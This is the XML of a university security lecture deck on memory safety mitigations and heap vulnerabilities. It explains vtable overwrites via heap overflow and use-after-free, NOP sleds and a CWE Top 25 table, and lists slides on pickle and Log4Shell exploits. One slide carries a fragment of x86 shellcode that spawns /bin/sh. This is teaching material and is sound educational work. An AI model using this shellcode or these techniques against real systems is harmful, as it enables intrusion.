          <p:cNvPr id="1028" name="Google Shape;1028;p1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1029" name="Google Shape;1029;p111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="4157725"/>
            <a:ext cx="33513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attacker controls everything above the instance variable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on the heap, including the vtable pointer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30" name="Google Shape;1030;p111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31" name="Google Shape;1031;p111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32" name="Google Shape;1032;p111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33" name="Google Shape;1033;p111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34" name="Google Shape;1034;p111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35" name="Google Shape;1035;p111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36" name="Google Shape;1036;p111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37" name="Google Shape;1037;p111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8" name="Google Shape;1038;p111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9" name="Google Shape;1039;p111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40" name="Google Shape;1040;p111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Google Shape;1041;p111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42" name="Google Shape;1042;p111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3" name="Google Shape;1043;p111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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1049" name="Google Shape;1049;p1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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1050" name="Google Shape;1050;p112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address of </a:t>
                      </a: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1" name="Google Shape;1051;p112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sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="4157725"/>
            <a:ext cx="33513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vtable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is now a pointer to shellcode. If method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/>
              <a:t>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is called, it will execute shellcode!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3" name="Google Shape;1053;p112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136650" y="2205750"/>
            <a:ext cx="253750" cy="318098"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10150" h="23424" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="10150" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9369" y="23424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54" name="Google Shape;1054;p112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55" name="Google Shape;1055;p112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56" name="Google Shape;1056;p112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57" name="Google Shape;1057;p112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8" name="Google Shape;1058;p112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59" name="Google Shape;1059;p112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0" name="Google Shape;1060;p112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112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62" name="Google Shape;1062;p112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3" name="Google Shape;1063;p112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64" name="Google Shape;1064;p112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5" name="Google Shape;1065;p112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6" name="Google Shape;1066;p112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2488450" y="2470850"/>
            <a:ext cx="253750" cy="318098"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10150" h="23424" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="10150" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9369" y="23424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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1072" name="Google Shape;1072;p1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overflow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Objects are allocated in the heap (using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/>
              <a:t> in C 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/>
              <a:t> in C++)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write to a buffer in the heap is not checked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overflows the buffer and overwrites the vtable pointer of the next object to point to a malicious vtable, with pointers to malicious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next object’s function is called, accessing the vtable pointer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Use-after-free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object is deallocated too early (using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"/>
              <a:t> in C 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/>
              <a:t> in C++)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allocates memory, which returns the memory freed by the object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overwrites a vtable pointer under the attacker’s control to point to a malicious vtable, with pointers to malicious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deallocated object’s function is called, accessing the vtable pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1073" name="Google Shape;1073;p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1079" name="Google Shape;1079;p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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1080" name="Google Shape;1080;p114"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="46771"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075" y="4439225"/>
            <a:ext cx="374875" cy="704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1" name="Google Shape;1081;p114"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="717100" y="1239875"/>
          <a:ext cx="7714500" cy="3816950"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F6F63FF-C5C4-4278-AC2D-502748384C56}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="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Rank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Name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Score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('Cross-site Scripting')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CWE-787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CWE-125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CWE-119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CWE-89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('SQL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CWE-200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[8]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CWE-416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[9]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CWE-352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[10]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CWE-78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('OS Command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CWE-190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('Path Traversal')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CWE-476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CWE-287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CWE-434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CWE-732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CWE-94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('Code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Robust Exploits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1087" name="Google Shape;1087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NOP Sleds</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1093" name="Google Shape;1093;p1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Instead of having to jump to an exact address, make it “close enough” so that small shifts don’t break your exploit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NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Short for no-operation or no-op, an instruction that does nothing (except advance the EIP)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real instruction in x86, unlike RISC-V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Chaining a long sequence of NOPs means that landing anywhere in the sled will bring you to your shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1094" name="Google Shape;1094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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1095" name="Google Shape;1095;p116"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7094250" y="1215625"/>
            <a:ext cx="1378200" cy="382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xor %eax, %eax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%eax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$0x68732f2f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$0x6e69622f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%esp, %ebx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%eax, %ecx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%eax, %edx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$0xb, %al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int $0x80</a:t>
            </a:r>
            <a:endParaRPr sz="9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6" name="Google Shape;1096;p116"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7936950" y="1293275"/>
            <a:ext cx="0" cy="217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10874</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>2218</Paragraphs>
  <Slides>110</Slides>
  <Notes>110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3" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>CS 161</vt:lpstr>
      <vt:lpstr>Mitigating Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Next: Memory Safety Mitigations</vt:lpstr>
      <vt:lpstr>Today: Defending Against Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Today: Defending Against Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Using Memory-Safe Languages</vt:lpstr>
      <vt:lpstr>Today: Defending Against Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Memory-Safe Languages</vt:lpstr>
      <vt:lpstr>Why Use Non-Memory-Safe Languages?</vt:lpstr>
      <vt:lpstr>The Cited Reason: The Myth of Performance</vt:lpstr>
      <vt:lpstr>The Cited Reason: The Myth of Performance</vt:lpstr>
      <vt:lpstr>The Real Reason: Legacy</vt:lpstr>
      <vt:lpstr>Writing Memory-Safe Code</vt:lpstr>
      <vt:lpstr>Today: Defending Against Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Writing Memory-Safe Code</vt:lpstr>
      <vt:lpstr>Writing Memory-Safe Code</vt:lpstr>
      <vt:lpstr>Building Secure Software</vt:lpstr>
      <vt:lpstr>Today: Defending Against Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Approaches for Building Secure Software/Systems</vt:lpstr>
      <vt:lpstr>Approaches for Building Secure Software/Systems</vt:lpstr>
      <vt:lpstr>Testing for Software Security Issues</vt:lpstr>
      <vt:lpstr>Working Towards Secure Systems</vt:lpstr>
      <vt:lpstr>Exploit Mitigations</vt:lpstr>
      <vt:lpstr>Today: Defending Against Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Exploit Mitigations</vt:lpstr>
      <vt:lpstr>Recall: Putting Together an Attack</vt:lpstr>
      <vt:lpstr>Recall: Putting Together an Attack</vt:lpstr>
      <vt:lpstr>Mitigation: Non-Executable Pages</vt:lpstr>
      <vt:lpstr>Recall: Putting Together an Attack</vt:lpstr>
      <vt:lpstr>Non-Executable Pages</vt:lpstr>
      <vt:lpstr>Subverting Non-Executable Pages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Mitigation: Stack Canaries</vt:lpstr>
      <vt:lpstr>Recall: Putting Together an Attack</vt:lpstr>
      <vt:lpstr>Stack Canaries</vt:lpstr>
      <vt:lpstr>Stack Canaries: Properties</vt:lpstr>
      <vt:lpstr>Stack Canaries</vt:lpstr>
      <vt:lpstr>Stack Canaries: Efficiency</vt:lpstr>
      <vt:lpstr>Subverting Stack Canaries</vt:lpstr>
      <vt:lpstr>Subverting Stack Canaries: Leaking the Canary</vt:lpstr>
      <vt:lpstr>Subverting Stack Canaries: Bypassing the Canary</vt:lpstr>
      <vt:lpstr>Subverting Stack Canaries: Guessing the Canary</vt:lpstr>
      <vt:lpstr>Subverting Stack Canaries: Guessing the Canary</vt:lpstr>
      <vt:lpstr>Mitigation: Pointer Authentication</vt:lpstr>
      <vt:lpstr>Recall: Putting Together an Attack</vt:lpstr>
      <vt:lpstr>Reminder: 32-Bit and 64-Bit Processors</vt:lpstr>
      <vt:lpstr>Pointer Authentication</vt:lpstr>
      <vt:lpstr>Pointer Authentication: Properties of the PAC</vt:lpstr>
      <vt:lpstr>Subverting Pointer Authentication</vt:lpstr>
      <vt:lpstr>Defenses Against Pointer Reuse</vt:lpstr>
      <vt:lpstr>Pointer Authentication on ARM</vt:lpstr>
      <vt:lpstr>Mitigation: Address Space Layout Randomization (ASLR)</vt:lpstr>
      <vt:lpstr>Recall: Putting Together an Attack</vt:lpstr>
      <vt:lpstr>Recall: x86 Memory Layout</vt:lpstr>
      <vt:lpstr>Recall: x86 Memory Layout</vt:lpstr>
      <vt:lpstr>Recall: x86 Memory Layout</vt:lpstr>
      <vt:lpstr>Address Space Layout Randomization</vt:lpstr>
      <vt:lpstr>ASLR: Efficiency</vt:lpstr>
      <vt:lpstr>Subverting ASLR</vt:lpstr>
      <vt:lpstr>Relative Addresses</vt:lpstr>
      <vt:lpstr>Combining Mitigations</vt:lpstr>
      <vt:lpstr>Combining Mitigations</vt:lpstr>
      <vt:lpstr>Combining Mitigations</vt:lpstr>
      <vt:lpstr>Enabling Mitigations</vt:lpstr>
      <vt:lpstr>Enabling Mitigations: CISCO</vt:lpstr>
      <vt:lpstr>Enabling Mitigations: Internet of Things</vt:lpstr>
      <vt:lpstr>Summary: Memory Safety Mitigations</vt:lpstr>
      <vt:lpstr>Summary: Memory Safety Mitigations</vt:lpstr>
      <vt:lpstr>Summary: Memory Safety Mitigations</vt:lpstr>
      <vt:lpstr>Heap Vulnerabilities</vt:lpstr>
      <vt:lpstr>Targeting Instruction Pointers</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>Heap Vulnerabilities</vt:lpstr>
      <vt:lpstr>Top 25 Most Dangerous Software Weaknesses (2020)</vt:lpstr>
      <vt:lpstr>Writing Robust Exploits</vt:lpstr>
      <vt:lpstr>NOP Sleds</vt:lpstr>
      <vt:lpstr>Serialization</vt:lpstr>
      <vt:lpstr>Serialization in Java and Python</vt:lpstr>
      <vt:lpstr>Log4Shell Vulnerability</vt:lpstr>
      <vt:lpstr>Using Serialization</vt:lpstr>
      <vt:lpstr>Serialization Vulnerabilities in pickle (Python)</vt:lpstr>
      <vt:lpstr>A pickle (Python) exploit</vt:lpstr>
      <vt:lpstr>Serialization Vulnerabilities in Java</vt:lpstr>
      <vt:lpstr>Log4j</vt:lpstr>
      <vt:lpstr>Log4j and JNDI (Java Naming &amp; Directory Interface)</vt:lpstr>
      <vt:lpstr>Serialization: Detection and Defenses</vt:lpstr>
      <vt:lpstr>Summary: Memory Safety Vulnerabilities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Mitigating Memory Safety Vulnerabilities</dc:title>
  <cp:lastModifiedBy>Jian Xiang</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-21T14:42:50Z</dcterms:modified>
</cp:coreProperties>
</file>